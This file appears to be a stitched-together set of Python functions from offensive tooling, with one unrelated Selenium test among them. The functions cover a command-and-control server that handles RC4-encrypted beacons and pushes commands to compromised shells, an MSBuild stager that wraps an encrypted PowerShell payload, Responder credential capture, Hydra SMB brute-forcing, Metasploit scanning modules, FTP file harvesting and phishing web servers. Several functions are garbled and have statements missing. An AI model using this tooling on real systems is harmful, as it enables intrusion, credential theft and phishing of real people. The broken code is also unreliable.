def get_autocommands(self, guid): profile = self.config.get("profile") commands = profile.get("autocommands") if isinstance(commands, list): shell = self.db.get_prompt(guid).decode().split(" ")[1] UI.success("Running auto commands on shell %s" % shell) Log.log_event("Running auto commands on shell", shell) for command in commands: print("\t[+] %s" % command) Log.log_shell(guid, "Sending", command) self.db.append_shell_data( guid, "[%s] AutoCommand Sending: \n%s\n\n" % (Utils.timestamp(), command)) self.db.push_cmd(guid, command, Utils.guid(), self.config.get("username"))
def process(self): temp_file = self.config[ "proofsDir"] + self.shortName + "_" + Utils.getRandStr(10) command = "responder -I eth0 -wrf" # run for 15 minutes # result = Utils.execWait(command, temp_file, timeout=900) result = Utils.execWait(command, temp_file, timeout=60) # TODO # check to see if we got any creds # if not, wait 5 minutes and run again for 15 minutes # repeat upto 5 4 times return
class YtSite(object): def __init__(self, driver, logger, url): self.driver = driver self.logger = logger self.url = url self.utils = Utils(self.driver, self.logger) def run(self): # 测试网站模块 self.utils.get_item_and_click('//li[9]/a') self.driver.implicitly_wait(3) self.utils.get_item_and_click('//tr[1]//a[2]') self.utils.insert_to_all_text() self.utils.select_all_item(1) self.utils.get_item_and_click('//button[1]')
def do_POST(self): if self.path.split('/')[1] == 'api': server_api = ServerApi(self.config, self) self.output = server_api.process() self.return_json() return length = 0 if not self.headers.getheader('Content-Length') == None: length = int(self.headers.getheader('Content-Length')) data = try: data = json.loads(data) data['Data'] = self.rc4.crypt(base64.b64decode(data['Data'])) except: Log.log_error('Invalid base64 data received or bad decryption', self.path) self.return_data() return guid = '' try: guid = Utils.validate_guid(data['ID']) except: Log.log_error('Invalid request no GUID', self.path) self.return_data() return if not guid == None: self.db.update_checkin(guid, str(self.client_address[0])) parser = HTTPDParser(config) output = parser.parse_cmd(guid, data['Data'], data['UUID']) if not output == None: uuid = output[:36] output = output[37:] self.output = \ base64.b64encode(self.rc4.crypt(output)) self.output = json.dumps({'UUID': uuid, 'ID': guid, 'Data': self.output}) else: self.output = json.dumps({'UUID': None, 'ID': guid,'Data': Utils.gen_str(random.randrange(10,1000))}) self.return_json() return else: self.output = Utils.load_file('html/%s' % self.config.get('http-default-404')) self.return_data()
def do_POST(self): if self.path.split("/")[1] == "api": server_api = ServerApi(self.config, self) self.output = server_api.process() self.return_json() return length = 0 if not self.headers.get("Content-Length") == None: length = int(self.headers.get("Content-Length")) data = try: data = json.loads(data) data["Data"] = self.rc4.dcrypt(base64.b64decode(data["Data"])) except Exception as e: print("%s, %s" % (sys.exc_info()[1],sys.exc_info()[2])) Log.log_error("Invalid base64 data received or bad decryption", self.path) self.return_data() return guid = "" try: guid = Utils.validate_guid(data["ID"]) except Exception as e: print("%s, %s" % (sys.exc_info()[1],sys.exc_info()[2])) Log.log_error("Invalid request no GUID", self.path) self.return_data() return if not guid == None: self.db.update_checkin(guid, str(self.client_address[0])) parser = HTTPDParser(config) output = parser.parse_cmd(guid, data["Data"], data["UUID"]) if not output == None: uuid = output[:36] output = output[37:] self.output = base64.b64encode(self.rc4.crypt(output)).decode() self.output = json.dumps({"UUID": uuid, "ID": guid, "Data": self.output}) else: self.output = json.dumps({"UUID": None, "ID": guid,"Data": Utils.gen_str(random.randrange(10,1000))}) self.return_json() return else: self.output = Utils.load_file("html/%s" % self.config.get("http-default-404")) self.return_data()
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) # Get list of working community strings for this host comStrings = kb.get("vuln/host/" + t + "/snmpCred/communityString") for comString in comStrings: myMsf.lock.acquire() msf.execute("use auxiliary/scanner/snmp/snmp_enumshares\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set COMMUNITY %s\n" % comString) msf.execute("exploit\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (".*execution completed.*", result) is None): result = result + msf.getResult() myMsf.lock.release() outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # Don't need to parse out IP, we are running module one IP at a time # Just find lines with - and pull out share name parts = re.findall(".* - .*", result) for part in parts: sharename = (part.split('-')[0]).strip() kb.add("share/smb/" + t + "/" + sharename) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) myMsf.lock.acquire() self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use auxiliary/scanner/x11/open_x11\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("exploit\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (".*execution completed.*", result) is None): result = result + msf.getResult() myMsf.lock.release() outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) parts = re.findall(".*Open X Server.*", result) for part in parts: callFire = True self.addVuln(t, "openX11", {"port": "6000", "message": str(part), "output": outfile.replace("/", "%2F")}) # Nothing to trigger? if callFire:"x11Access") # clean up after ourselves result = msf.cleanup() return
def generate_msbuild(self, ps): msbuild = Utils.load_powershell_script("../bin/stager.csproj", 999) rc4_key = RC4.gen_rc4_key(32) hex_rc4_key = RC4.format_rc4_key(rc4_key) rc4 = RC4(rc4_key) data = base64.b64encode(rc4.crypt(ps)) return msbuild.replace("[PAYLOAD]", data).replace("[KEY]", hex_rc4_key)
def searchTarget(self, target, port, username, password): success = False # start packet capture # cap = self.pktCap(filter="tcp and port " + str(port) + " and host " + target, packetcount=10, timeout=10, # srcip="", dstip=target) try: if (Utils.port_open(target, 21)): # attempt to connect to the remote host with ftputil.FTPHost(target, username, password) as host: success = True # get list of files and loop over them recursive = host.walk("/", topdown=True, onerror=None) for root, dirs, files in recursive: for name in files: for pattern in self.filepatterns: match_list = fnmatch.filter(files, pattern) for fname in match_list: fpath = host.path.join(root, fname) if host.path.isfile(fpath): fpath, self.config["proofsDir"] + ip + fpath.replace("/", "_")) host.close() except ftputil.error.PermanentError: self.display.error("Could not connect to %s on port 21" % (target)) # outfile = self.config["proofsDir"] + self.shortName + "_PCAP_Port" + str(port) + "_" + target + "_" + Utils.getRandStr(10) # Utils.writeFile(self.getPktCap(cap), outfile) # kb.add("host/" + target + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) return success
def start(self): self.loadSites() if self.config["ip"] == "": self.config["ip"]=Utils.getIP() #define phishing sites for key in self.websites: self.phishingsites[key] = PhishingSite(self.config, key, self.websites[key]['path'], self.logpath, "logs/" + self.websites[key]['logfile'], self.db, self.websites[key]['redirecturl']).getResource() site_length = 0 for key in self.phishingsites: if (len(key) > site_length): site_length = len(key) # if we are doing port based print for key in self.phishingsites: for port in range(self.MINPORT, self.MAXPORT): try: site = Site(self.phishingsites[key], logPath=self.logpath + "logs/" + self.websites[key]['logfile']+".access") # site.logRequest = True reactor.listenTCP(port, site) print "Started website [%s] on [http://%s:%s]" % (('{:<%i}' % (site_length)).format(key), self.config["ip"], port) self.websites[key]['port'] = port break except twisted.internet.error.CannotListenError, ex: continue
def loadSites(self): templates = self.getTemplates() print # loop over each web template for f in templates: template_file = f + "/CONFIG" if Utils.is_readable(template_file) and os.path.isfile(template_file): print "Found the following web sites: [%s]" % template_file # read in the VHOST, LOGFILE, and REDIRECTURL VHOST = "" LOGFILE = "" REDIRECTURL = "" #PATH = self.config["web_template_path"] + f + "/" PATH = f + "/" with open (template_file, "r") as myfile: for line in myfile.readlines():"VHOST=", line) if match: VHOST=line.replace('"', "") VHOST=VHOST.split("=") VHOST=VHOST[1].lower().strip()"LOGFILE=", line) if match2: LOGFILE=line.replace('"', "") LOGFILE=LOGFILE.split("=") LOGFILE=LOGFILE[1].strip()"REDIRECTURL=", line) if match3: REDIRECTURL=line.replace('"', "") REDIRECTURL=REDIRECTURL.replace(r'\n', "\n") REDIRECTURL=REDIRECTURL.split("=") REDIRECTURL=REDIRECTURL[1].strip() self.websites[VHOST] = {'path':PATH, 'port':8000, 'logfile':LOGFILE, 'redirecturl':REDIRECTURL}
def flushdb(self, data): force = Utils.get_arg_at(data, 1, 1) if force: self.db.flushdb() UI.error("The whole redis DB was flushed") else: UI.error("Please use the force switch")
def start(self): self.loadSites() if self.config["ip"] == "": self.config["ip"] = Utils.getIP() #define phishing sites for key in self.websites: self.phishingsites[key] = PhishingSite( self.config, key, self.websites[key]['path'], self.logpath, "logs/" + self.websites[key]['logfile'], self.db, self.websites[key]['redirecturl']).getResource() site_length = 0 for key in self.phishingsites: if (len(key) > site_length): site_length = len(key) # if we are doing port based print for key in self.phishingsites: for port in range(self.MINPORT, self.MAXPORT): try: site = Site(self.phishingsites[key], logPath=self.logpath + "logs/" + self.websites[key]['logfile'] + ".access") # site.logRequest = True reactor.listenTCP(port, site) print "Started website [%s] on [http://%s:%s]" % ( ('{:<%i}' % (site_length)).format(key), self.config["ip"], port) self.websites[key]['port'] = port break except twisted.internet.error.CannotListenError, ex: continue
def start(self): self.loadSites() ip = Utils.getIP() #define phishing sites for key in self.websites: self.phishingsites[key] = PhishingSite(self.config, key, self.websites[key]['path'], self.logpath, self.websites[key]['logfile'], self.websites[key]['redirecturl']).getResource() site_length = 0 for key in self.phishingsites: if (len(key) > site_length): site_length = len(key) # if we are doing port based print for key in self.phishingsites: for port in range(self.MINPORT, self.MAXPORT): try: reactor.listenTCP(port, Site(self.phishingsites[key])) print "Started website [%s] on [http://%s:%s]" % (('{:<%i}' % (site_length)).format(key), ip, port) self.websites[key]['port'] = port break except twisted.internet.error.CannotListenError, ex: continue
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: users = self.getUsers(t) self.display.verbose(self.shortName + " - Connecting to " + t) for user in users: # verify we have not tested this host before if not self.seentarget(t + str(user)): # add the new IP to the already seen list self.addseentarget(t + str(user)) # make outfile temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) command = self.config["hydra"] + " -s 445 -l " + user + " -P " + self.config[ "miscDir"] + "passwords.txt smb://" + t result = Utils.execWait(command, temp_file, timeout=30) # Extract usernames & passwords from results and add to KB parts = re.findall(".* login:\s\s*([^\s]*)\s\s*password:\s\s*([^\s]*)", result) for part in parts:"newSmbPassword") self.addVuln(t, "guessable password", {"output": temp_file.replace("/", "%2F")}) self.display.debug( "Identified username [" + part[0] + "] with password [" + part[1] + "] on " + t) kb.add("creds/host/" + t + "/username/" + part[0].strip() + "/password/" + part[1].strip()) return
def process(self): # load any targets we are interested in self.getTargets() callFire = False # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): self.display.verbose(self.shortName + " - Connecting to " + t) # add the new IP to the already seen list self.addseentarget(t) # make outfile outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) # run rpcclient command = "ldapsearch -h " + t + " -p 389 -x -s base" result = Utils.execWait(command, outfile) # TODO - Parse output and do stuff parts = re.findall("ref: .*", result) for part in parts: callFire = True self.addVuln(t, "AnonymousLDAP", {"port": "389", "message": str(part).replace("/", "%2F"), "output": outfile.replace("/", "%2F")}) if callFire:"anonymousLDAP") return